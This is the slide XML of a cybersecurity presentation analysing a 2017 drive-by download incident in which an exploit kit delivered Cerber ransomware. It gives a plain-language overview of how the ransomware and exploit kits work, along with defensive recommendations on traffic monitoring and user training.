                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>Outboundconnections</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to suspicious or unknown domains should be closely monitored. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>Automatedsystems</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should alert the SOC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>teamof</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any unusual traffic patterns that may indicate redirection to a malicious site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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User awareness and education: Many drive-by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>downloadattacks</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exploit user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>trustin</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legitimate websites. Increased user training on recognizing suspicious behavior (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>e.g.,unexpected</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pop-ups, redirections) can help prevent users from inadvertently falling victim to such attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-37465"/>
            <a:ext cx="18288000" cy="10286365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="24" name="Diagram 24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="2472690"/>
          <a:ext cx="5086985" cy="6005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 name="Diagram 25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="12877800" y="3181985"/>
          <a:ext cx="4297680" cy="45866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3" name="Diagram 23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5791200" y="3162300"/>
          <a:ext cx="6357620" cy="547243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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7171690" y="877570"/>
            <a:ext cx="3851910" cy="1587500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>content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2576341" y="1801985"/>
            <a:ext cx="3086100" cy="2652117"/>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16" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10095757" y="5832898"/>
            <a:ext cx="3086100" cy="2652117"/>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8" name="TextBox 18"/>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19" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9328126" y="2091882"/>
            <a:ext cx="7101947" cy="6103235"/>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28274" r="-712"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 2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22" name="TextBox 2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03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302127" y="2088384"/>
            <a:ext cx="5278742"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INCIDENT SUMMARY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552392" y="3526597"/>
            <a:ext cx="9136896" cy="3887470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>in January 27, 2017, an incident was triggered by a user who inadvertently accessed a compromised webpage while searchingfor "home improvement remodeling your kitchen." This user-initiated event led to a drive-bydownload attack that was executed using an ExploitKit (EK). The attacker exploited vulnerabilities in the user'sbrowser to silentlyredirect them from a legitimate website,homeimprovement.com,to a malicious domain ty.benme.com, controlled by the attacker. This redirection resultedin the download of malicious files, including Cerber ransomware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFF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04</a:t>
            </a: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12600863" y="6007827"/>
            <a:ext cx="4243184" cy="3646486"/>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7" name="TextBox 17"/>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18" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1443953" y="6007827"/>
            <a:ext cx="4243184" cy="3646486"/>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0" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="114300" y="-38100"/>
              <a:ext cx="584200" cy="736600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2660"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1876051" y="5375140"/>
            <a:ext cx="14535897" cy="4911860"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2067104" cy="698500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2067104" cy="698500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2067104" h="698500">
                  <a:moveTo>
                    <a:pt x="2067104" y="349250"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1863904" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="349250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863904" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2067104" y="349250"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect t="-30648" b="-35814"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670617" y="2626293"/>
            <a:ext cx="5003723"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INCIDENT SUMMARY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7911731" y="1570922"/>
            <a:ext cx="9381384" cy="2910841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>The incidentwas first identified when the **SnortNetwork Intrusion Detection System(NIDS)** detected suspicious activity originating from the user's system. The attacker's goal was not to steal data, but rather to infect the system with ransomware and encrypt its contents for monetary gain. However, due to the rapid detection and response by the SOC team, the incident was contained before significant damage could occu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04</a:t>
            </a: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783590" y="2019300"/>
            <a:ext cx="6470015" cy="1850390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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Cerber Ransomeware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679450" y="3619500"/>
            <a:ext cx="10045065" cy="4153535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Cerber was first discovered in 2016 and was considered one of the most dangerous ransomware threats at the time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>It used a strong encryption method that made it difficult to decrypt files without paying the ransom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Cerber ransomware is ransomware-as-a-service (RaaS), which means that the attacker licenses Cerber ransomware over the internet and splits the ransom with the developer.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04</a:t>
            </a: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783590" y="1714500"/>
            <a:ext cx="9372600" cy="925195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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How Cerber Ransomware Works?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2933700"/>
            <a:ext cx="13769340" cy="4153535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Cerber ransomware works in a few basic steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>1- Infection: It enters your computer through a malicious email attachment, a compromised website, or other means.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>2- Scanning: Cerber scans your computer for valuable files like documents, photos, and videos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>3- Encryption: It encrypts these files using a strong encryption algorithm, making them inaccessible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>4- Ransom Note: Cerber leaves a ransom note on your computer explaining what has happened and demanding a payment to unlock your files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>5- Payment: The ransom note provides instructions on how to pay the ransom, often in cryptocurrency.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>6- Decryption: If you pay the ransom and the attackers are legitimate, they may provide a decryption key to unlock your files.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04</a:t>
            </a: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783590" y="2019300"/>
            <a:ext cx="9372600" cy="925195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500" dirty="0" err="1">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eXPloit</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6500" dirty="0" err="1">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kITs</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679450" y="3390900"/>
            <a:ext cx="13769340" cy="4153535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Exploit kits were developed as a way to automatically and silently exploit vulnerabilities on victims’ machines while browsing the web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Due to their highly automated nature, exploit kits have become one of the most popular methods of mass malware or remote access tool (RAT) distribution by criminal groups, lowering the barrier to entry for attackers. Exploit kits are also effective at generating profit for malicious actors. Creators of exploit kits offer these campaigns for rent on underground criminal markets in the form of exploit kits as a service, where the price for leading kits can reach thousands of dollars per month.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TotalTime>
  <Words>3351</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>426</Paragraphs>
  <Slides>39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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="54" baseType="lpstr">
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>ui-sans-serif</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>ui-monospace</vt:lpstr>
      <vt:lpstr>Canva Sans</vt:lpstr>
      <vt:lpstr>Open Sans Bold</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Abadi</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Bebas Neue Cyrillic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Cyber Security Presentation</dc:title>
  <dc:creator>Fady Maged</dc:creator>
  <cp:lastModifiedBy>Fady Maged</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-03T15:30:52Z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FD8A8B8D2F844E33B3CC6A440EC4C579_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.18283</vt:lpwstr>
  </property>
</Properties>
</file>